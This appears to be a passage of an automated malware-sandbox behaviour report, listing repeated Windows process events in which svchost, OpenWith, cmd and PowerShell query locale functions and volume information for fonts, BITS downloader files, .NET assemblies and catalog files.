Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoW, 46_2_00007FFA41873744
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW, 46_2_00007FFA41881900
Source: C:\Windows\System32\svchost.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID, 46_2_00007FFA41873CA4
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 46_2_00007FFA41881D34
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 46_2_00007FFA41881F2C
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
